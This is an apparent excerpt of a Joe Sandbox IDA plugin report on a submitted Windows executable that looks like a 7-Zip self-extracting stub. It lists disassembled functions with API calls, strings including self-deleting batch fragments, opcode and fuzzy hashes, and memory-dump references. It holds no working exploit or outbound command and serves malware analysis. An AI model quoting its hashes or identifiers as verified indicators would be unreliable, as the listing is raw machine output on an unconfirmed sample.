                                                            • Snapshot File: hcaresult_0_2_400000_CnjMEmbChO.jbxd
                                                            Similarity
                                                            • API ID: ??3@$File$AttributesCloseCreateDriveExecuteHandleShellTypeWrite
                                                            • String ID: "$" goto Repeat$7ZSfx%03x.cmd$:Repeat$del "$if exist "$open
                                                            • API String ID: 3007203151-3467708659
                                                            • Opcode ID: 867eebb51e1b750364ee620a5f1ec15cba4384e9a655442323ea2c3f34152715
                                                            • Instruction ID: 7a4c4b622d76ac6c1822c64a370ea4e05d699ec4102568342bfcf68b8c9639ad
                                                            • Opcode Fuzzy Hash: 867eebb51e1b750364ee620a5f1ec15cba4384e9a655442323ea2c3f34152715
                                                            • Instruction Fuzzy Hash: DE416171D01119BADB00EBA5ED85DEEBB78EF44358F50803AF511720E1EB78AE85CB58
                                                            Function 00404603 Relevance: 35.2, APIs: 3, Strings: 17, Instructions: 207stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • lstrcmpiW.KERNEL32(00000000,0041442C,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004046DF
                                                              • Part of subcall function 00401F9D: GetLastError.KERNEL32(00000000,00000020,?), ref: 00401FEC
                                                              • Part of subcall function 00401F9D: wsprintfW.USER32 ref: 00401FFD
                                                              • Part of subcall function 00401F9D: GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 00402012
                                                              • Part of subcall function 00401F9D: GetLastError.KERNEL32 ref: 00402017
                                                              • Part of subcall function 00401F9D: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00402032
                                                              • Part of subcall function 00401F9D: GetEnvironmentVariableW.KERNEL32(?,00000000,?), ref: 00402045
                                                              • Part of subcall function 00401F9D: GetLastError.KERNEL32 ref: 0040204C
                                                              • Part of subcall function 00401F9D: lstrcmpiW.KERNEL32(00000000,00000020), ref: 00402061
                                                              • Part of subcall function 00401F9D: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00402071
                                                              • Part of subcall function 00401F9D: SetLastError.KERNEL32(00000000), ref: 00402098
                                                              • Part of subcall function 00401F9D: lstrlenA.KERNEL32(00413FD0), ref: 004020CC
                                                              • Part of subcall function 00401F9D: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004020E7
                                                              • Part of subcall function 00401F9D: GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00402119
                                                            • _wtol.MSVCRT ref: 004047DC
                                                            • _wtol.MSVCRT ref: 004047F8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.84739528062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.84739482791.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739558347.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739585827.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739606233.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_CnjMEmbChO.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$??2@EnvironmentVariable_wtollstrcmpi$??3@InfoLocalelstrlenwsprintf
                                                            • String ID: CancelPrompt$ErrorTitle$ExtractCancelText$ExtractDialogText$ExtractDialogWidth$ExtractPathText$ExtractPathTitle$ExtractPathWidth$ExtractTitle$GUIFlags$GUIMode$MiscFlags$OverwriteMode$Progress$Title$WarningTitle$|wA
                                                            • API String ID: 2725485552-3187639848
                                                            • Opcode ID: 7a70c90a09e6339ceb99db9b5511794fba0efbdd365b8bdd8dc3dc4b6a1705ac
                                                            • Instruction ID: a5d789275b7dd46d140941e9fd319bf554fc7ea6ad5da08365fcb0f0a182a74d
                                                            • Opcode Fuzzy Hash: 7a70c90a09e6339ceb99db9b5511794fba0efbdd365b8bdd8dc3dc4b6a1705ac
                                                            • Instruction Fuzzy Hash: 4251B5F1A402047EDB10BB619D86EFF36ACDA85308B64443BF904F32C1E6BC5E854A6D
                                                            Function 00402DC0 Relevance: 35.1, APIs: 16, Strings: 4, Instructions: 123windowlibrarystringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetClassNameA.USER32(?,?,00000040), ref: 00402DD3
                                                            • lstrcmpiA.KERNEL32(?,STATIC), ref: 00402DE6
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00402DF3
                                                              • Part of subcall function 00402D7D: GetWindowTextLengthW.USER32(?), ref: 00402D8E
                                                              • Part of subcall function 00402D7D: GetWindowTextW.USER32(00402E07,00000000,00000001), ref: 00402DAB
                                                              • Part of subcall function 00401A85: CharUpperW.USER32(?,7727E0B0,00000000,00000000,?,?,?,00403DBD,00000002), ref: 00401AC3
                                                              • Part of subcall function 00401A85: CharUpperW.USER32(?,?,?,?,00403DBD,00000002), ref: 00401ACF
                                                            • ??3@YAXPAX@Z.MSVCRT(?), ref: 00402E20
                                                            • GetParent.USER32(?), ref: 00402E2E
                                                            • LoadLibraryA.KERNEL32(riched20), ref: 00402E42
                                                            • GetMenu.USER32(?), ref: 00402E55
                                                            • SetThreadLocale.KERNEL32(00000419), ref: 00402E62
                                                            • CreateWindowExW.USER32(00000000,RichEdit20W,0041335C,50000804,?,?,?,?,?,00000000,00000000,00000000), ref: 00402E92
                                                            • DestroyWindow.USER32(?), ref: 00402EA3
                                                            • SendMessageW.USER32(00000000,00000459,00000022,00000000), ref: 00402EB8
                                                            • GetSysColor.USER32(0000000F), ref: 00402EBC
                                                            • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00402ECA
                                                            • SendMessageW.USER32(00000000,00000461,?,?), ref: 00402EF5
                                                            • ??3@YAXPAX@Z.MSVCRT(?), ref: 00402EFA
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00402F02
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.84739528062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.84739482791.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739558347.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739585827.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739606233.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_CnjMEmbChO.jbxd
                                                            Similarity
                                                            • API ID: Window$??3@MessageSend$CharTextUpper$ClassColorCreateDestroyLengthLibraryLoadLocaleLongMenuNameParentThreadlstrcmpi
                                                            • String ID: RichEdit20W$STATIC$riched20${\rtf
                                                            • API String ID: 1731037045-2281146334
                                                            • Opcode ID: 2b38b22499d69b5ca28c01525db5cb238b78fd2564d1ef548c56061806c72a13
                                                            • Instruction ID: c7c9ca1f65d7473fe19c29f8272bdbb18bb8b251efb89c9ee4785ec66c96c850
                                                            • Opcode Fuzzy Hash: 2b38b22499d69b5ca28c01525db5cb238b78fd2564d1ef548c56061806c72a13
                                                            • Instruction Fuzzy Hash: FE316072A40119BFDB01AFA5DD49DEF7BBCEF08745F104036F601B21D1DA789A008B68
                                                            Function 00401CC8 Relevance: 31.6, APIs: 21, Instructions: 121windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetWindowDC.USER32(00000000), ref: 00401CD4
                                                            • GetDeviceCaps.GDI32(00000000,00000058), ref: 00401CE0
                                                            • MulDiv.KERNEL32(00000000,00000064,00000060), ref: 00401CF9
                                                            • GetObjectW.GDI32(?,00000018,?), ref: 00401D28
                                                            • MulDiv.KERNEL32(?,00000003,00000002), ref: 00401D33
                                                            • MulDiv.KERNEL32(?,00000003,00000002), ref: 00401D3D
                                                            • CreateCompatibleDC.GDI32(?), ref: 00401D4B
                                                            • CreateCompatibleDC.GDI32(?), ref: 00401D52
                                                            • SelectObject.GDI32(00000000,?), ref: 00401D60
                                                            • CreateCompatibleBitmap.GDI32(?,?,?), ref: 00401D6E
                                                            • SelectObject.GDI32(00000000,00000000), ref: 00401D76
                                                            • SetStretchBltMode.GDI32(00000000,00000004), ref: 00401D7E
                                                            • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 00401D9D
                                                            • GetCurrentObject.GDI32(00000000,00000007), ref: 00401DA6
                                                            • SelectObject.GDI32(00000000,?), ref: 00401DB3
                                                            • SelectObject.GDI32(00000000,?), ref: 00401DB9
                                                            • DeleteDC.GDI32(00000000), ref: 00401DC2
                                                            • DeleteDC.GDI32(00000000), ref: 00401DC5
                                                            • ReleaseDC.USER32(00000000,?), ref: 00401DCC
                                                            • ReleaseDC.USER32(00000000,?), ref: 00401DDB
                                                            • CopyImage.USER32(?,00000000,00000000,00000000,00000000), ref: 00401DE8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.84739528062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.84739482791.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739558347.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739585827.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739606233.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_CnjMEmbChO.jbxd
                                                            Similarity
                                                            • API ID: Object$Select$CompatibleCreate$DeleteReleaseStretch$BitmapCapsCopyCurrentDeviceImageModeWindow
                                                            • String ID:
                                                            • API String ID: 3462224810-0
                                                            • Opcode ID: edcdae41b00ef410d3e7ba3ed19d3c131e86ad83f2f2f2d47359cb6bb3a71bdf
                                                            • Instruction ID: 24730f8ff9b6a3f8d7f0600a39c6f646a54ca28d21b12e05547a6914d757f366
                                                            • Opcode Fuzzy Hash: edcdae41b00ef410d3e7ba3ed19d3c131e86ad83f2f2f2d47359cb6bb3a71bdf
                                                            • Instruction Fuzzy Hash: 00313976D00208BBDF215FA19C48EEFBFBDEB48752F108066F604B21A0C6758A50EB64
                                                            Function 00401DF3 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 120windowcommemoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetClassNameA.USER32(?,?,00000040), ref: 00401E05
                                                            • lstrcmpiA.KERNEL32(?,STATIC), ref: 00401E1C
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00401E2F
                                                            • GetMenu.USER32(?), ref: 00401E44
                                                              • Part of subcall function 00401BDF: GetModuleHandleW.KERNEL32(00000000), ref: 00401BEA
                                                              • Part of subcall function 00401BDF: FindResourceExA.KERNEL32(00000000,?,?,00000000), ref: 00401C07
                                                              • Part of subcall function 00401BDF: FindResourceExA.KERNEL32(00000000,?,?,00000409), ref: 00401C1B
                                                              • Part of subcall function 00401BDF: SizeofResource.KERNEL32(00000000,00000000), ref: 00401C2C
                                                              • Part of subcall function 00401BDF: LoadResource.KERNEL32(00000000,00000000), ref: 00401C36
                                                              • Part of subcall function 00401BDF: LockResource.KERNEL32(00000000), ref: 00401C41
                                                            • GlobalAlloc.KERNEL32(00000040,00000010), ref: 00401E76
                                                            • memcpy.MSVCRT(00000000,00000000,00000010), ref: 00401E83
                                                            • CoInitialize.OLE32(00000000), ref: 00401E8C
                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000000,?), ref: 00401E98
                                                            • OleLoadPicture.OLEAUT32(?,00000000,00000000,00414C14,?), ref: 00401EBD
                                                            • GlobalFree.KERNEL32(00000000), ref: 00401ECD
                                                              • Part of subcall function 00401CC8: GetWindowDC.USER32(00000000), ref: 00401CD4
                                                              • Part of subcall function 00401CC8: GetDeviceCaps.GDI32(00000000,00000058), ref: 00401CE0
                                                              • Part of subcall function 00401CC8: MulDiv.KERNEL32(00000000,00000064,00000060), ref: 00401CF9
                                                              • Part of subcall function 00401CC8: GetObjectW.GDI32(?,00000018,?), ref: 00401D28
                                                              • Part of subcall function 00401CC8: MulDiv.KERNEL32(?,00000003,00000002), ref: 00401D33
                                                              • Part of subcall function 00401CC8: MulDiv.KERNEL32(?,00000003,00000002), ref: 00401D3D
                                                              • Part of subcall function 00401CC8: CreateCompatibleDC.GDI32(?), ref: 00401D4B
                                                              • Part of subcall function 00401CC8: CreateCompatibleDC.GDI32(?), ref: 00401D52
                                                              • Part of subcall function 00401CC8: SelectObject.GDI32(00000000,?), ref: 00401D60
                                                              • Part of subcall function 00401CC8: CreateCompatibleBitmap.GDI32(?,?,?), ref: 00401D6E
                                                              • Part of subcall function 00401CC8: SelectObject.GDI32(00000000,00000000), ref: 00401D76
                                                              • Part of subcall function 00401CC8: SetStretchBltMode.GDI32(00000000,00000004), ref: 00401D7E
                                                              • Part of subcall function 00401CC8: StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 00401D9D
                                                              • Part of subcall function 00401CC8: GetCurrentObject.GDI32(00000000,00000007), ref: 00401DA6
                                                              • Part of subcall function 00401CC8: SelectObject.GDI32(00000000,?), ref: 00401DB3
                                                              • Part of subcall function 00401CC8: SelectObject.GDI32(00000000,?), ref: 00401DB9
                                                              • Part of subcall function 00401CC8: DeleteDC.GDI32(00000000), ref: 00401DC2
                                                              • Part of subcall function 00401CC8: DeleteDC.GDI32(00000000), ref: 00401DC5
                                                              • Part of subcall function 00401CC8: ReleaseDC.USER32(00000000,?), ref: 00401DCC
                                                            • GetObjectW.GDI32(00000000,00000018,?), ref: 00401EFF
                                                            • SetWindowPos.USER32(00000010,00000000,00000000,00000000,?,?,00000006), ref: 00401F13
                                                            • SendMessageW.USER32(00000010,00000172,00000000,?), ref: 00401F25
                                                            • GlobalFree.KERNEL32(00000000), ref: 00401F3A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.84739528062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.84739482791.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739558347.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739585827.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739606233.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_CnjMEmbChO.jbxd
                                                            Similarity
                                                            • API ID: Object$Resource$CreateGlobalSelect$CompatibleWindow$DeleteFindFreeLoadStretch$AllocBitmapCapsClassCurrentDeviceHandleInitializeLockLongMenuMessageModeModuleNamePictureReleaseSendSizeofStreamlstrcmpimemcpy
                                                            • String ID: IMAGES$STATIC
                                                            • API String ID: 4202116410-1168396491
                                                            • Opcode ID: 352b3c5e08a174ec4a3ffb4ca519ce1611b0b6cc4168eadb64d38ca8f457be46
                                                            • Instruction ID: 08c73d75f8249df6a552952f3d33af28cabbedea74541c6d0cfd8ce2793c0c4e
                                                            • Opcode Fuzzy Hash: 352b3c5e08a174ec4a3ffb4ca519ce1611b0b6cc4168eadb64d38ca8f457be46
                                                            • Instruction Fuzzy Hash: C7417C71A00218BFCB11DFA1DC49DEEBF7DEF08742B008076FA05A61A0DB758A41DB68
                                                            Function 0040813D Relevance: 27.1, APIs: 18, Instructions: 147windowcomtimeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0040692C: GetDlgItem.USER32(?,?), ref: 00406939
                                                              • Part of subcall function 0040692C: ShowWindow.USER32(00000000,?), ref: 00406950
                                                            • GetDlgItem.USER32(?,000004B8), ref: 0040816A
                                                            • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00408179
                                                            • GetDlgItem.USER32(?,000004B5), ref: 004081C0
                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 004081C5
                                                            • GetDlgItem.USER32(?,000004B5), ref: 004081D5
                                                            • SetWindowLongW.USER32(00000000), ref: 004081D8
                                                            • GetSystemMenu.USER32(?,00000000,000004B4,00000000), ref: 004081FE
                                                            • EnableMenuItem.USER32(00000000,0000F060,00000001), ref: 00408210
                                                            • GetDlgItem.USER32(?,000004B4), ref: 0040821A
                                                            • SetFocus.USER32(00000000), ref: 0040821D
                                                            • SetTimer.USER32(?,00000001,00000000,00000000), ref: 0040824C
                                                            • CoCreateInstance.OLE32(00414C34,00000000,00000001,00414808,00000000), ref: 00408277
                                                            • GetDlgItem.USER32(?,00000002), ref: 00408294
                                                            • IsWindow.USER32(00000000), ref: 00408297
                                                            • GetDlgItem.USER32(?,00000002), ref: 004082A7
                                                            • EnableWindow.USER32(00000000), ref: 004082AA
                                                            • GetDlgItem.USER32(?,000004B5), ref: 004082BE
                                                            • ShowWindow.USER32(00000000), ref: 004082C1
                                                              • Part of subcall function 00407134: GetDlgItem.USER32(?,000004B6), ref: 00407142
                                                              • Part of subcall function 00407B33: GetDlgItem.USER32(?,000004B8), ref: 00407B8B
                                                              • Part of subcall function 00407B33: SendMessageW.USER32(00000000,00000402,00000000,00000000), ref: 00407B9D
                                                              • Part of subcall function 00407B33: wsprintfW.USER32 ref: 00407BBB
                                                              • Part of subcall function 00407B33: ??3@YAXPAX@Z.MSVCRT(?), ref: 00407C53
                                                              • Part of subcall function 00407D06: GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,0040803E), ref: 00407D30
                                                              • Part of subcall function 00407D06: LoadIconW.USER32(00000000), ref: 00407D33
                                                              • Part of subcall function 00407D06: GetSystemMetrics.USER32(00000032), ref: 00407D43
                                                              • Part of subcall function 00407D06: GetSystemMetrics.USER32(00000031), ref: 00407D48
                                                              • Part of subcall function 00407D06: GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,0040803E), ref: 00407D51
                                                              • Part of subcall function 00407D06: LoadImageW.USER32(00000000), ref: 00407D54
                                                              • Part of subcall function 00407D06: SendMessageW.USER32(?,00000080,00000001,?), ref: 00407D79
                                                              • Part of subcall function 00407D06: SendMessageW.USER32(?,00000080,00000000,?), ref: 00407D89
                                                              • Part of subcall function 00407D06: GetWindow.USER32(?,00000005), ref: 00407E76
                                                              • Part of subcall function 00407D06: GetWindow.USER32(?,00000005), ref: 00407E92
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.84739528062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.84739482791.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739558347.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739585827.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739606233.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_CnjMEmbChO.jbxd
                                                            Similarity
                                                            • API ID: Item$Window$MessageSend$System$EnableHandleLoadLongMenuMetricsModuleShow$??3@CreateFocusIconImageInstanceTimerwsprintf
                                                            • String ID:
                                                            • API String ID: 1309318444-0
                                                            • Opcode ID: f96aa9b93e1fd9714dbcbc8c2c582c1e46f74a713c41b2300bd45d2dcf84ac32
                                                            • Instruction ID: 3ce0214ef3d03b0ee840dd4ab9c121ae631e901bc0d6870238ad5b6e85178a64
                                                            • Opcode Fuzzy Hash: f96aa9b93e1fd9714dbcbc8c2c582c1e46f74a713c41b2300bd45d2dcf84ac32
                                                            • Instruction Fuzzy Hash: 014174B0644748ABDA206F65DD49F5B7BADEB40B05F00847DF552A62E1CB79B800CA1C
                                                            Function 00403093 Relevance: 26.5, APIs: 10, Strings: 5, Instructions: 244stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,hAA,00000000), ref: 004030F6
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,hAA,00000000), ref: 004030FE
                                                            • strncmp.MSVCRT ref: 004031F1
                                                            • ??3@YAXPAX@Z.MSVCRT(?,00000000), ref: 00403255
                                                            • lstrcmpW.KERNEL32(?,SetEnvironment,00000000), ref: 00403273
                                                            • ??3@YAXPAX@Z.MSVCRT(0040414C,?), ref: 00403347
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.84739528062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.84739482791.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739558347.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739585827.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739606233.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_CnjMEmbChO.jbxd
                                                            Similarity
                                                            • API ID: ??3@$lstrcmpstrncmp
                                                            • String ID: GUIFlags$MiscFlags$SetEnvironment$hAA${\rtf
                                                            • API String ID: 2881732429-172299233
                                                            • Opcode ID: 436b0b5fdcd0fc7850317bda0c1040a654aafe726af0558e82b6743448b11ef5
                                                            • Instruction ID: da55d09168dcf28f6e950782b6654b171f18f9ca5632fa18d2c46afc5d57570a
                                                            • Opcode Fuzzy Hash: 436b0b5fdcd0fc7850317bda0c1040a654aafe726af0558e82b6743448b11ef5
                                                            • Instruction Fuzzy Hash: 23819D31900218ABDF11DFA1CD55BEE7B78AF14305F1040ABE8017B2E6DB78AB05DB59
                                                            Function 00406A47 Relevance: 24.3, APIs: 16, Instructions: 270COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetDlgItem.USER32(?,000004B3), ref: 00406A69
                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 00406A6E
                                                            • GetDlgItem.USER32(?,000004B4), ref: 00406AA5
                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 00406AAA
                                                            • GetSystemMetrics.USER32(00000010), ref: 00406B0B
                                                            • GetSystemMetrics.USER32(00000011), ref: 00406B11
                                                            • GetSystemMetrics.USER32(00000008), ref: 00406B18
                                                            • GetSystemMetrics.USER32(00000007), ref: 00406B1F
                                                            • GetParent.USER32(?), ref: 00406B43
                                                            • GetClientRect.USER32(00000000,?), ref: 00406B55
                                                            • ClientToScreen.USER32(?,?), ref: 00406B68
                                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00406BCE
                                                            • GetClientRect.USER32(?,?), ref: 00406C55
                                                            • ClientToScreen.USER32(?,?), ref: 00406B71
                                                              • Part of subcall function 0040690F: GetDlgItem.USER32(?,?), ref: 0040691B
                                                            • GetSystemMetrics.USER32(00000008), ref: 00406CD6
                                                            • GetSystemMetrics.USER32(00000007), ref: 00406CDD
                                                              • Part of subcall function 00406A18: GetDlgItem.USER32(?,?), ref: 00406A36
                                                              • Part of subcall function 00406A18: SetWindowPos.USER32(00000000), ref: 00406A3D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.84739528062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.84739482791.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739558347.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739585827.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739606233.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_CnjMEmbChO.jbxd
                                                            Similarity
                                                            • API ID: MetricsSystem$ClientItemWindow$LongRectScreen$Parent
                                                            • String ID:
                                                            • API String ID: 747815384-0
                                                            • Opcode ID: bdc5cc6ef77edd437f37f749138dc65a224d6988716d71e8386f1ae5cf91717f
                                                            • Instruction ID: 701d8c843d4ec3579feae24e97f284edc15b0bac0439a5efdbaa5111af673c9b
                                                            • Opcode Fuzzy Hash: bdc5cc6ef77edd437f37f749138dc65a224d6988716d71e8386f1ae5cf91717f
                                                            • Instruction Fuzzy Hash: 7B912D71A00209AFDB14DFB9CD85AEEB7F9EF48704F148529E642F6290D778E9008B64
                                                            Function 00407D06 Relevance: 22.7, APIs: 15, Instructions: 231windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,0040803E), ref: 00407D30
                                                            • LoadIconW.USER32(00000000), ref: 00407D33
                                                            • GetSystemMetrics.USER32(00000032), ref: 00407D43
                                                            • GetSystemMetrics.USER32(00000031), ref: 00407D48
                                                            • GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,0040803E), ref: 00407D51
                                                            • LoadImageW.USER32(00000000), ref: 00407D54
                                                            • SendMessageW.USER32(?,00000080,00000001,?), ref: 00407D79
                                                            • SendMessageW.USER32(?,00000080,00000000,?), ref: 00407D89
                                                            • GetWindow.USER32(?,00000005), ref: 00407E76
                                                            • GetWindow.USER32(?,00000005), ref: 00407E92
                                                            • GetWindow.USER32(?,00000005), ref: 00407EAA
                                                            • GetModuleHandleW.KERNEL32(00000000,00000065,000004B4,00000000,000004B3,00000000,000004B2,?,000004B7,?,?,?,?,?,0040803E), ref: 00407F0A
                                                            • LoadIconW.USER32(00000000), ref: 00407F0D
                                                            • GetDlgItem.USER32(?,000004B1), ref: 00407F28
                                                            • SendMessageW.USER32(00000000), ref: 00407F2F
                                                              • Part of subcall function 0040725A: GetDlgItem.USER32(?,?), ref: 00407264
                                                              • Part of subcall function 0040725A: GetWindowTextLengthW.USER32(00000000), ref: 0040726B
                                                              • Part of subcall function 0040692C: GetDlgItem.USER32(?,?), ref: 00406939
                                                              • Part of subcall function 0040692C: ShowWindow.USER32(00000000,?), ref: 00406950
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.84739528062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.84739482791.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739558347.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739585827.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739606233.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_CnjMEmbChO.jbxd
                                                            Similarity
                                                            • API ID: Window$HandleItemLoadMessageModuleSend$IconMetricsSystem$ImageLengthShowText
                                                            • String ID:
                                                            • API String ID: 1889686859-0
                                                            • Opcode ID: 54e99e0b53345dbf389ae49fdb6e6d7c6227533794aadf34278c182137d853b4
                                                            • Instruction ID: b6a50195b8a608de49edc5b96f3e83ee8a9b90890169e94b1220211b89b9884f
                                                            • Opcode Fuzzy Hash: 54e99e0b53345dbf389ae49fdb6e6d7c6227533794aadf34278c182137d853b4
                                                            • Instruction Fuzzy Hash: E861D47064C7096AE9257B61DC4AF3B3699AB40B05F10447FF642B92D2DBBCBC0056AF
                                                            Function 00406F37 Relevance: 16.6, APIs: 11, Instructions: 87windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetParent.USER32(?), ref: 00406F45
                                                            • GetWindowLongW.USER32(00000000), ref: 00406F4C
                                                            • DefWindowProcW.USER32(?,?,?,?), ref: 00406F62
                                                            • CallWindowProcW.USER32(?,?,?,?,?), ref: 00406F7F
                                                            • GetSystemMetrics.USER32(00000031), ref: 00406F91
                                                            • GetSystemMetrics.USER32(00000032), ref: 00406F98
                                                            • GetWindowDC.USER32(?), ref: 00406FAA
                                                            • GetWindowRect.USER32(?,?), ref: 00406FB7
                                                            • DrawIconEx.USER32(00000000,?,?,?,?,?,00000000,00000000,00000003), ref: 00406FEB
                                                            • ReleaseDC.USER32(?,00000000), ref: 00406FF3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.84739528062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.84739482791.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739558347.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739585827.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739606233.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_CnjMEmbChO.jbxd
                                                            Similarity
                                                            • API ID: Window$MetricsProcSystem$CallDrawIconLongParentRectRelease
                                                            • String ID:
                                                            • API String ID: 2586545124-0
                                                            • Opcode ID: 25d202db14ae47cc7765131eef640a3ba3c2163a3dcc7105130798770ded3a1b
